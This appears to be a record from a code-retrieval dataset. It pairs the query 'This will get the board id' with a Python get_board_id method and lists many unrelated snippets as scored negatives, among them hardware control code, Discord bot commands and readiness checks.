"def boot(self):\n\t\tmesslen, received = self.socket.send('bootm\\r', 25)\t\t\n\t\treturn None",
"def isReady(self):\n\t\twhile self.osc.trigger_state() != \"save\":\n\t\t\ttime.sleep(.1)\n\t\treturn True",
"def check_ready(self):\r\n print \"Checking ready\"\r\n\t\tif self.game.trough.is_full():\r\n print \"Ready\"\r\n\t\t\tself.ready()\r\n\t\t\treturn True\r\n\t\tprint \"Not Ready\"\r\n\t\treturn False",
"def _WaitForUSBDevice(self, name, vendor_id, product_id, timeout=10):\n self._out.Progress('Waiting for board to appear on USB bus')\n start_time = time.time()\n while time.time() - start_time < timeout:\n try:\n args = ['-d', '%04x:%04x' % (vendor_id, product_id)]\n self._tools.Run('lsusb', args, sudo=True)\n self._out.Progress('Found %s board' % name)\n return True\n\n except CmdError:\n pass\n\n return False",
"def test_command_finds_commands(self):\r\n COMMANDLIST['!toread'] = lambda bmark: bmark\r\n\r\n bm = BmarkMock()\r\n bm.tags['!toread'] = True\r\n commander = Commander(bm)\r\n commander.build_commands()\r\n\r\n self.assertTrue(\r\n '!toread' in commander.commands,\r\n \"Our commander should find !toread command to run\")",
"def test_device_command_list(self):\n default_cmds = helper_module.DEFAULT_TANGO_DEVICE_COMMANDS\n actual_device_cmds = set(self.sim_device.get_command_list()) - default_cmds\n expected_cmd_list = self.sim_file_parser.get_device_command_metadata().keys()\n self.assertEquals(\n actual_device_cmds,\n set(expected_cmd_list),\n \"The commands specified in the json file are not present in\" \" the device\",\n )",
"def _check_all_sensors_ready(self):\n \n self._check_dist_ready()\n self._check_angle_ready()\n self._check_odom_ready()\n self._check_distsb_ready()\n self._check_anglesb_ready()\n \n return True",
"def default_supported_commands(self, commands):\n self.state.default_supported_commands(commands)",
"def __init__(self, commands: dict):\n self.__commands = commands\n\n # Wait times (s).\n self.WT_PIN_TOGGLE = 0.2\n self.WT_STATE_LOOKUP = 0.1\n\n # GPIO pins.\n self.RST_PIN = 17\n self.DC_PIN = 25\n self.CS_PIN = 8\n self.BUSY_PIN = 24\n\n # Set GPIO pins.\n RPi.GPIO.setmode(RPi.GPIO.BCM)\n RPi.GPIO.setwarnings(False)\n RPi.GPIO.setup(self.RST_PIN, RPi.GPIO.OUT)\n RPi.GPIO.setup(self.DC_PIN, RPi.GPIO.OUT)\n RPi.GPIO.setup(self.CS_PIN, RPi.GPIO.OUT)\n RPi.GPIO.setup(self.BUSY_PIN, RPi.GPIO.IN)\n\n # SPI device.\n self.__spi = spidev.SpiDev(0, 0)\n\n # Set SPI device.\n self.__spi.max_speed_hz = 2000000\n self.__spi.mode = 0b00",
"def initialize_commands(self) -> None:\n\n @self.command(name=\"snr\")\n @logger(\"all\")\n async def snr(ctx, *args):\n await ctx.message.channel.send(str(indie_seq.Seq([int(k) for k in args]).f()))\n\n @self.command(name=\"oeis\")\n @logger(\"all\")\n async def oeis(ctx, *args):\n global oeis_in_progress\n if not oeis_in_progress:\n oeis_in_progress = True\n if len(args) > 0:\n await ctx.message.channel.send(indie_oeis.get_sequence_from_b_file(args[0]))\n else:\n await ctx.message.channel.send(indie_oeis.get_sequence_from_b_file(str(random.randint(1, 341962))))\n oeis_in_progress = False\n else:\n await ctx.message.add_reaction(\"❌\")\n\n @self.command(name=\"collatz\")\n @logger(\"all\")\n async def collatz(ctx, *args):\n num = int(args[0])\n inity = \"\" if len(args) < 2 else args[1]\n\n collatz_results = indie_collatz.collatz_info(num)\n if len(inity) == 1:\n if inity == \"e\":\n await ctx.message.channel.send(f\"Evenity trajectory of {num}: {collatz_results.evenity_trajectory}\")\n elif inity == \"o\":\n await ctx.message.channel.send(f\"Oddinity trajectory of {num}: {collatz_results.oddinity_trajectory}\")\n else:\n await ctx.message.channel.send(f\"Collatz trajectory of {num}: {collatz_results.collatz_trajectory}\")\n\n @self.group(name=\"pig\")\n @logger(\"pig-math\")\n async def pig(ctx, *args):\n if ctx.invoked_subcommand is None:\n await ctx.message.add_reaction(\"❌\")\n\n def get_user_id_from_mention(user_id):\n user_id = user_id.replace(\"<\", \"\")\n user_id = user_id.replace(\">\", \"\")\n user_id = user_id.replace(\"@\", \"\")\n user_id = user_id.replace(\"!\", \"\")\n return user_id\n\n # Pig Math commands\n\n @pig.command(name=\"challenge\")\n @logger(\"pig-math\")\n async def pig_challenge(ctx, *args):\n challengee = get_user_id_from_mention(args[1])\n challengee = (await self.fetch_user(challengee)).name\n if len(args) > 2:\n point_target = int(args[2])\n else:\n point_target = 100\n pig_challenge = indie_pig.PigChallenge.create_challenge(ctx.message.author.name, challengee, point_target)\n await ctx.message.channel.send(pig_challenge.status)\n\n @pig.command(name=\"accept\")\n @logger(\"pig-math\")\n async def pig_accept(ctx, *args):\n await ctx.message.channel.send(indie_pig.PigChallenge.accept_challenge(ctx.message.author.name))\n\n @pig.command(name=\"reject\")\n @logger(\"pig-math\")\n async def pig_reject(ctx, *args):\n await ctx.message.channel.send(indie_pig.PigChallenge.reject_challenge(ctx.message.author.name))\n\n @pig.command(name=\"roll\")\n @logger(\"pig-math\")\n async def pig_roll(ctx, *args):\n await ctx.message.channel.send(indie_pig.PigGame.play(ctx.message.author.name, \"roll\"))\n\n @pig.command(name=\"bank\")\n @logger(\"pig-math\")\n async def pig_bank(ctx, *args):\n await ctx.message.channel.send(indie_pig.PigGame.play(ctx.message.author.name, \"bank\"))\n\n @pig.command(name=\"score\")\n @logger(\"pig-math\")\n async def pig_score(ctx, *args):\n await ctx.message.channel.send(indie_pig.PigGame.play(ctx.message.author.name, \"score\"))\n\n @pig.command(name=\"quit\")\n @logger(\"pig-math\")\n async def pig_quit(ctx, *args):\n await ctx.message.channel.send(indie_pig.PigGame.play(ctx.message.author.name, \"quit\"))\n\n @self.command(name=\"save\")\n @logger(\"modonly\")\n async def save(ctx, *args):\n self.save_data_files()\n await ctx.message.channel.send(\"Saved.\")\n\n @self.command(name=\"balance\")\n @logger(\"all\")\n async def balance(ctx, *args):\n bals = self.data[\"balances.json\"]\n user = ctx.message.author.id\n bal = 0\n if user in 
bals:\n bal = bals[user]\n else:\n bals[user] = 0 \n await ctx.message.channel.send(ctx.message.author.name+\", your balance is \"+str(bal)+\".\")\n\n @self.command(name=\"credit\")\n @logger(\"modonly\")\n async def credit(ctx, *args):\n \"\"\"\n Command with credit users mentioned with first float arg detected\n \"\"\"\n users_mentioned = ctx.message.mentions\n user_mention = ctx.author.mention\n credit = 0\n for arg in args:\n try:\n credit = float(arg)\n await ctx.message.channel.send(user_mention+\", we have successfully debited as you commanded.\")\n break\n except:\n pass\n bals = self.data[\"balances.json\"]\n for user in users_mentioned:\n if user.id in bals:\n bals[user.id] += credit\n else:\n bals[user.id] = credit\n\n @self.command(name=\"debit\")\n @logger(\"modonly\")\n async def debit(ctx, *args):\n \"\"\"\n Command with credit users mentioned with first float arg detected\n \"\"\"\n users_mentioned = ctx.message.mentions\n user_mention = ctx.author.mention\n debit = 0\n for arg in args:\n try:\n debit = float(arg)\n await ctx.message.channel.send(user_mention+\", we have successfully debited as you commanded.\")\n break\n except:\n pass\n bals = self.data[\"balances.json\"]\n for user in users_mentioned:\n if user.id in bals:\n bals[user.id] -= debit\n else:\n bals[user.id] = -debit\n\n @self.command(name=\"register\")\n @logger(\"all\")\n async def register(ctx, *args):\n \"\"\"\n This command will trigger a check if the user is registered,\n if not, the bot will ask them to review the terms and conditions and accept,\n if they accept, the bot will consider them registered\n \"\"\"\n user = ctx.message.author\n user_mention = ctx.author.mention\n chan_mention = \"<#876850365730021386>\"\n \n if user in self.data[\"users.json\"]:\n await ctx.message.channel.send(user_mention+\", you are already registered. :blue_heart:\")\n else:\n self.data[\"users_asked_to_be_registered.json\"].append(user)\n await ctx.message.channel.send(user_mention+\", do you accept the \"+chan_mention+\n \" (Indie Library Terms of Service). Command .accept if you do. :blue_heart:\")\n \n @self.command(name=\"accept\")\n @logger(\"all\")\n async def accept(ctx, *args):\n \"\"\"\n This command will trigger a check if the user has asked to be registered.\n If they have, then calling this triggers adding them to registered users.\n If they have not, they will be asked to type .register first.\n \"\"\"\n user = ctx.message.author\n user_mention = \"<@\"+str(user.id)+\">\"\n\n if user in self.data[\"users_asked_to_be_registered.json\"]:\n self.data[\"users.json\"].append(user)\n self.data[\"users_asked_to_be_registered.json\"].remove(user)\n await ctx.message.channel.send(user_mention+\", you have been successfully registered. :blue_heart:\")\n else:\n await ctx.message.channel.send(user_mention+\", have not commanded .register yet. \"\n \"Please do so first. :blue_heart:\")",
"def _notify_comm_ready(self, comm):\n self.remote_call(\n comm_id=comm.comm_id,\n callback=self._comm_ready_callback\n )._comm_ready()",
"def send_commands(self, commands=None):\n commands = commands or []\n command_list = {}\n for command in commands:\n command_list[command.id] = {\n 'speed': command.speed, 'direction': command.direction\n }\n data = {'commands': command_list}\n state = self._post(data)\n status = state['status'].lower()\n print(\"status: {}\".format(status))\n if status == 'error':\n print(\"message: {}\".format(state['message']))\n elif status == 'finished':\n print(\"finished! Score: {} Watch result at: {}\".format(state['score'], state['visualization']))\n if 'requests' not in state:\n state['requests'] = []\n for elevator_data in state.get('elevators', []):\n if 'buttons_pressed' not in elevator_data:\n elevator_data['buttons_pressed'] = []\n\n return state",
"def get_available_commands(self, caller):\n # commands = [{\"name\":\"LOOK\", \"cmd\":\"look\", \"args\":self.dbref}]\n commands = [{\"name\":\"LOOT\", \"cmd\":\"loot\", \"args\":self.dbref}]\n return commands",
"def fillAdminReq():\n commands = os.listdir(adminDir)\n \n for el in commands:\n print 'Processing command ' + el\n if el == 'Turn_Tray.command':\n ser.write('T')\n ser.write('1')\n response = ser.read()\n print 'Arduino responded with ' + response\n elif el == 'Mix_Drink.command':\n ser.write('M')\n response = ser.read()\n print 'Arduino responded with ' + response\n elif el == 'Dispense_Drink_A.command':\n ser.write('A')\n response = ser.read()\n print 'Arduino responded with ' + response\n elif el == 'Dispense_Drink_B.command':\n ser.write('B')\n response = ser.read()\n print 'Arduino responded with ' + response\n else:\n print 'Command Unknown'\n\n os.remove(adminDir + '/' + el)",
"async def on_ready(self):\n db_guilds = set([int(k) for k in self.bot.main_repo.get_guilds().keys()])\n guilds = set(self.bot.guilds)\n\n for guild in guilds:\n\n \"\"\"GUILDS CHECK\"\"\"\n\n if guild.id not in db_guilds:\n self.bot.main_repo.create_guild(\n guild.id, guild.name, f\"{guild.owner}\"\n ) # If guild is not in DB, create it\n\n db_guild = self.bot.main_repo.get_guild(guild.id)\n\n if guild.id in db_guilds and not db_guild[\"present\"]:\n self.bot.main_repo.update_guild(guild.id, {\"present\": True})\n elif not db_guild[\"present\"]:\n continue\n\n await self.bot.utils_class.init_guild(guild)\n\n print(\"Omnitron is ready.\")\n info(\"Omnitron successfully started\")\n\n await self.bot.change_presence(\n activity=Activity(type=ActivityType.listening, name=f\"Ping me for prefix\")\n )\n\n self.bot.starting = False",
"def ready(self):\n if self.proc.stdout.readline() != \"OK\\n\":\n raise ValueError(\"Le bot {bot} n'arrive pas à se préparer\".format(bot=self.name))",
"def init_command_objects(self):\n super().init_command_objects()\n device_data = DeviceData.get_instance()\n\n args = (device_data, self.state_model, self.logger)\n\n self.register_command_object(\"SetStowMode\", SetStowMode(*args))\n self.register_command_object(\n \"SetStandbyLPMode\", SetStandbyLPMode(*args)\n )\n self.register_command_object(\"SetOperateMode\", SetOperateMode(*args))\n self.register_command_object(\"Scan\", Scan(*args))\n self.register_command_object(\"EndScan\", EndScan(*args))\n self.register_command_object(\"Configure\", Configure(*args))\n self.register_command_object(\"StartCapture\", StartCapture(*args))\n self.register_command_object(\"StopCapture\", StopCapture(*args))\n self.register_command_object(\n \"SetStandbyFPMode\", SetStandbyFPMode(*args)\n )\n self.register_command_object(\"Slew\", Slew(*args))\n self.register_command_object(\"Track\", Track(*args))\n self.register_command_object(\"StopTrack\", StopTrack(*args))\n self.register_command_object(\"Abort\", Abort(*args))\n self.register_command_object(\"Restart\", Restart(*args))\n self.register_command_object(\"ObsReset\", ObsReset(*args))",
"def is_ready(self) -> bool:\n pass",
"def allready(antReady) :\n return numNotready(antReady) == 0",
"def readCommand(self):\n while (True):\n time.sleep(1)\n # At least a package of 4 bytes (minimum)\n # [ Head | Length | Address | Data[0…N] | Check ]\n if (self._serial.inWaiting()>=4):\n # Gets only the first byte of the packet (it should be HEAD)\n packet_header = self._serial.read(1)\n if (packet_header != Ind903Packet.PACKET_HEAD):\n # the next one is the length of the packet\n packet_length_bytes = self._serial.read(1)\n packet_length = int.from_bytes(packet_length_bytes, byteorder='big')\n if (packet_length > 0):\n raw_packet = b\"\".join([packet_header, packet_length_bytes, self._serial.read(packet_length)]) \n result_packet = Ind903Packet.parsePacket(raw_packet)\n return (result_packet)",
"def is_ready(self):\n if not self.is_accessible:\n return False\n\n is_ready_cmd = '/usr/rift/bin/ssh_root {ip} -q -n -o BatchMode=yes -o StrictHostKeyChecking=no stat /var/lib/cloud/instance/boot-finished > /dev/null'\n rc = subprocess.call(is_ready_cmd.format(ip=self._ip), shell=True)\n\n logger.info(\"Checking if {} is ready\".format(self._ip))\n if rc != 0:\n return False\n\n return True",
"def cmd_handler():\n context = zmq.Context()\n\n # socket to receive commands (a subscription to ELECTION_CODE channel)\n cmd_socket = context.socket(zmq.SUB)\n cmd_socket.connect (\"tcp://%s:5556\" % SERVER_HOST)\n topicfilter = \"politiche2013\"\n cmd_socket.setsockopt(zmq.SUBSCRIBE, topicfilter)\n\n # socket to send replies\n reply_sender = context.socket(zmq.PUSH)\n reply_sender.connect(\"tcp://%s:5557\" % SERVER_HOST)\n\n # main loop\n while True:\n print \"Aye sir, unit {0} ready for your commands ...\".format(computer_id)\n # wait for a command\n string = cmd_socket.recv()\n\n # action\n print \"Message received: '%s'\" % (string,)\n\n # send reply to server\n print \"Sending reply to server\"\n reply = { 'unit' : computer_id, 'status' : 'configured'}\n reply_sender.send_json(reply)",
"def waitonautozero(pidevice, axes=None, timeout=300, predelay=0, postdelay=0, polldelay=0.1):\n if not isdeviceavailable([GCS2Commands, GCS21Commands], pidevice):\n raise TypeError('Type %s of pidevice is not supported!' % type(pidevice).__name__)\n\n axes = getaxeslist(pidevice, axes)\n if not axes:\n return\n waitonready(pidevice, timeout=timeout, predelay=predelay, polldelay=polldelay)\n maxtime = time() + timeout\n while not all(list(pidevice.qATZ(axes).values())):\n if time() > maxtime:\n raise SystemError('waitonautozero() timed out after %.1f seconds' % timeout)\n sleep(polldelay)\n sleep(postdelay)",
"def control_wait_for_ready(self) -> None:\n self.__logger.debug('Eva.control_wait_for_ready called')\n return self.__http_client.control_wait_for_ready()",
"async def _list_commands(self):\n message_cmds = \"regular commands:\\n\"\n tts_cmds = \"tts commands:\\n\"\n cur = self.conn.cursor()\n cur.execute(\n \"SELECT invoke FROM message_commands WHERE istts is true;\")\n cmd_invokes = cur.fetchall()\n for invoke in cmd_invokes:\n tts_cmds += invoke[0] + ', '\n tts_cmds = tts_cmds[0:-2]\n cur.execute(\n \"SELECT invoke FROM message_commands WHERE istts is false;\")\n cmd_invokes = cur.fetchall()\n for invoke in cmd_invokes:\n message_cmds += invoke[0] + ', '\n message_cmds = message_cmds[0:-2]\n cur.close()\n await self.bot.say(message_cmds)\n await self.bot.say(tts_cmds)"
] | [
"0.66666836",
"0.6577503",
"0.64121866",
"0.62709725",
"0.60107315",
"0.5956526",
"0.5840667",
"0.57543665",
"0.57164615",
"0.5709062",
"0.57082236",
"0.5687072",
"0.5677375",
"0.5664126",
"0.5635631",
"0.56272054",
"0.56113994",
"0.5595407",
"0.55702424",
"0.5542301",
"0.55404663",
"0.5527589",
"0.550858",
"0.5505093",
"0.5491871",
"0.5479855",
"0.5461874",
"0.54524934",
"0.5450419",
"0.54497105",
"0.544245",
"0.5426359",
"0.5414273",
"0.5412483",
"0.5411912",
"0.54113185",
"0.54079515",
"0.54049677",
"0.5403449",
"0.538727",
"0.53781366",
"0.53492546",
"0.53475034",
"0.53426677",
"0.533779",
"0.5336901",
"0.53340924",
"0.5332267",
"0.531689",
"0.52995694",
"0.52893704",
"0.52823746",
"0.52779686",
"0.5275879",
"0.5275492",
"0.5267894",
"0.52499187",
"0.52410215",
"0.52410215",
"0.52410215",
"0.52410215",
"0.5234913",
"0.52334446",
"0.52287656",
"0.522405",
"0.522405",
"0.52190423",
"0.52094823",
"0.52040076",
"0.5189371",
"0.51841056",
"0.5164193",
"0.5164043",
"0.5161925",
"0.5154653",
"0.514824",
"0.5136568",
"0.513281",
"0.5124847",
"0.5118619",
"0.51126724",
"0.510964",
"0.5107207",
"0.5099327",
"0.5090706",
"0.5083482",
"0.50755626",
"0.5067753",
"0.50661033",
"0.5060736",
"0.50521135",
"0.5050474",
"0.5050291",
"0.5047107",
"0.5044666",
"0.50309014",
"0.5030859",
"0.50169516",
"0.50101095",
"0.50100553",
"0.50094783"
] | 0.0 | -1 |
This will get the board id. | def get_board_id(self, timeout = 0):
self.get_option_from_shouter([t_var_size_Options.BOARD_ID], BP_TOOL.REQUEST_VAR)
return str(self.config_var.options[t_var_size_Options.BOARD_ID]['value'].decode("ASCII")) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"async def __board_id(self) -> str:\n url = await self.__url_with_auth(\"1/members/me/boards?fields=name\")\n boards = await (await super()._get_source_responses(url))[0].json()\n return str(first(boards, lambda board: self._parameter(\"board\") in board.values())[\"id\"])",
"def ask_for_board_id(self):\n board_id = raw_input(\"paste in board id or url: \").strip()\n m = re.search(r\"(?:https?://)?(?:trello.com)?/?b?/?([a-zA-Z]{8})/(?:.*)\", board_id)\n if m:\n board_id = m.group(1)\n return board_id",
"def get_board():\r\n try:\r\n get_board_property('BOARD')\r\n except:\r\n logging.info(\"board property not found\")\r\n return -1",
"def get_board(self):\r\n return self.board",
"def get_board(self):\n return self.board",
"def board_game_geek_id(title):\n pass",
"def get_board(self):\n pass",
"def get_board(self):\n return self._board",
"def get_board(self):\n return self._board",
"def getBoard(self):\n return self.board",
"def get_game_board(self):\n return self.board",
"def _getUID(self, board=0, bank=0, channel=0):\n return board*512 + bank*128 + channel",
"def get_board(self):\n return self._board.get_board()",
"def get_board_name(self):\n pass",
"def get_board(self):\n\n return self._board",
"def getID():",
"def getId(self):\n if self.id: return self.id\n reader = self.getReader()\n subData = reader.findSubRecord('INTV','LAND')\n (self.gridX,self.gridY) = struct.unpack('ii',subData)\n self.id = '[%d,%d]' % (self.gridX,self.gridY)\n return self.id",
"def get_seat_id(boarding_pass: str) -> int:\n row, column = parse_boarding_pass(boarding_pass)\n return row * 8 + column",
"def getID(self) -> int:\n ...",
"def _get_id(self):\n return self.id",
"def get_board(board_id):\n all_boards = [board for board in GRAPH_DB.find(\"board\")]\n board = filter(lambda b: b._id == board_id, all_boards)[0]\n return {\"ladders\": from_hackerrank_paths(board[\"ladders\"]),\n \"snakes\": from_hackerrank_paths(board[\"snakes\"])}",
"def getID(self):\n return self.__clubDbID",
"def tile_id(self):\n return self._tile_id",
"def get_id(self):\n pass",
"def get_id(self):\n pass",
"def get_id(self):\n pass",
"def get_id(self):\n pass",
"def get_id(self):\n if hasattr(self, \"_thread_id\"):\n return self._thread_id\n for id, thread in threading._active.items():\n if thread is self:\n return id",
"def get_id(self):\n if hasattr(self, \"_thread_id\"):\n return self._thread_id\n for id, thread in threading._active.items():\n if thread is self:\n return id",
"def get_winner(self, board):\r\n for p_id in self.player_ids:\r\n win_array = np.array([p_id] * self.board_width, dtype=np.int8)\r\n for i in range(self.board_width):\r\n # check rows\r\n if np.array_equal(board[i], win_array):\r\n return p_id\r\n # check columns\r\n elif np.array_equal(board[:, i], win_array):\r\n return p_id\r\n # check leading diagonal\r\n elif np.array_equal(np.diagonal(board), win_array):\r\n return p_id\r\n # check non-leading diagonal\r\n elif np.array_equal(np.diagonal(np.flipud(board)), win_array):\r\n return p_id\r\n # return nan if no wins losses or draws\r\n for i in np.nditer(board):\r\n if i == 0:\r\n return np.nan\r\n # must be a draw so return 0\r\n return 0",
"def getIdent (self) :\n return self.id",
"def get_id(self):\n\n\t\treturn self.__id",
"def get_player_id(self):\n return self.game.get_player_id()",
"def find_issue_id(self):",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def getId(self):\n if getattr(self,'id',None):\n return self.id\n name = self.name\n #--Singleton records \n if name in frozenset(('FMAP','GAME','JOUR','KLST','PCDT','REFR','SPLM','TES3')):\n return None\n #--Special records.\n elif name == 'CELL':\n reader = self.getReader()\n srName = reader.findSubRecord('NAME',name)\n srData = reader.findSubRecord('DATA',name)\n (flags,gridX,gridY) = struct.unpack('3i',record.data)\n if flags & 1:\n self.id = cstrip(srName)\n else:\n self.id = '[%d,%d]' % (gridX,gridY)\n elif name == 'INFO':\n srData = self.getReader().findSubRecord('INAM',name)\n self.id = cstrip(srData)\n elif name == 'LAND':\n srData = self.getReader().findSubRecord('INTV',name)\n self.id = '[%d,%d]' % struct.unpack('2i',srData)\n elif name == 'PGRD':\n reader = self.getReader()\n srData = reader.findSubRecord('DATA',name)\n srName = reader.findSubRecord('NAME',name)\n gridXY = struct.unpack('2i',srData[:8])\n if srData != (0,0) or not srName:\n self.id = '[%d,%d]' % gridXY\n else:\n self.id = cstrip(srName)\n elif name == 'SCPT':\n srData = self.getReader().findSubRecord('SCHD',name)\n self.id = cstrip(srData[:32])\n #--Most records: id in NAME record.\n else:\n srData = self.getReader().findSubRecord('NAME',name)\n self.id = srData and cstrip(srData)\n #--Done\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_board(self):\n return self.board.copy()",
"def get_id(self) -> int:\n return self.id",
"def get_id(self) -> int:\n return self.id",
"def board(self, board_id):\r\n return Board(self, board_id)",
"def _get_thread_id() -> int:\n # NOTICE:\n # we do not use threading.get_ident() to identify a thread, as Python recycles these identifiers\n return id(threading.current_thread())",
"def get_id(self):\n for id, thread in threading._active.items(): \n if thread is self: \n return id",
"def get_id(self):\n return self._column_id",
"def get_id(self):\n return self.__id",
"def get_id(self):\n return self.__id",
"def id(self):\n # Might also be a first 12-characters shortcut.\n return self._id",
"def get_game_id(self) -> str:\n return self.game_name_entry.get()",
"def get_id(self):\n \"\"\"Requires use of Python 3\"\"\"\n return str(self.id)"
] | [
"0.8467954",
"0.7145274",
"0.7045439",
"0.6920562",
"0.687995",
"0.67577267",
"0.6710416",
"0.66724986",
"0.66724986",
"0.664022",
"0.66289103",
"0.65972143",
"0.65322155",
"0.6522598",
"0.6491379",
"0.626192",
"0.62350416",
"0.6232243",
"0.62153196",
"0.61943984",
"0.6173523",
"0.6135429",
"0.6132925",
"0.61313546",
"0.61313546",
"0.61313546",
"0.61313546",
"0.6081715",
"0.6081715",
"0.6078952",
"0.60713255",
"0.60482967",
"0.6018613",
"0.60053676",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.59757555",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.59603435",
"0.5948806",
"0.5948806",
"0.5934224",
"0.5932575",
"0.5918911",
"0.5915601",
"0.5895594",
"0.5895594",
"0.58865106",
"0.588197",
"0.5875737"
] | 0.7062877 | 2 |
This will return a string representing the current state of the system. | def get_state(self, timeout = 0):
self.get_option_from_shouter([t_var_size_Options.CURRENT_STATE], BP_TOOL.REQUEST_VAR)
rval = str(self.config_var.options[t_var_size_Options.CURRENT_STATE]['value'].decode("ASCII"))
return rval | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def state(self) -> str:",
"def state(self):\n\n\t\treturn str(self)",
"def stateString(self):\n return self._mdp.stateString(self._cur_state);",
"def state(self):\r\n return str(self)",
"def print_state(self):\n print('\\nthe current state is: ' + str(self.state) + '\\n')",
"def state(self):\n return str(self)",
"def str_state(self) -> str:\n value = \"Not connected\"\n if self.STARTED:\n value = \"Connected\"\n value = f\"{value} to {self.url!r}, CLIENT v{self.PKG_VERSION}, PYTHON v{self.PY_VERSION}\"\n banner = get_env_ax().get(\"AX_BANNER\")\n if banner:\n value = f\"{value} [{banner}]\"\n return value",
"def current_state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"current_state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return self._state",
"def state(self) -> str:\n return self._state",
"def state(self) -> str:\n return self._state",
"def state(self) -> str:\n return self._state",
"def state(self) -> str:\n return self._state",
"def current_state(self) -> str:\n return self._state_storage.state",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def __repr__(self):\r\n r = str(self.current_instance_state())\r\n return r",
"def display_state(self):\r\n\r\n print('\\n')\r\n print('>>CURRENT STATE')\r\n ct = 0\r\n for i in self.state:\r\n for j in i:\r\n if j == -1:\r\n val = 'X'\r\n else:\r\n val = str(ct)\r\n if len(val) == 1:\r\n print(' ' + val + ' ', end='')\r\n else:\r\n print(val + ' ', end='')\r\n ct += 1\r\n print('\\n')",
"def report_state(self):\n text = \"Status: %d\"%self.state.num;\n if self.state.msg !=\"\":\n text += \", Msg: %s\"%self.state.msg;\n return text;",
"def state(self) -> str:\n return str(self.coordinator.server_status)",
"def state(self):\n\t\tif self._state in JOB_PS:\n\t\t\treturn JOB_PS[self._state]\n\t\telse:\n\t\t\treturn str(self._state)",
"def _get_status(self):\n held_msg=\"\"\n return u'%s%s' % (self.get_status_display(), held_msg)",
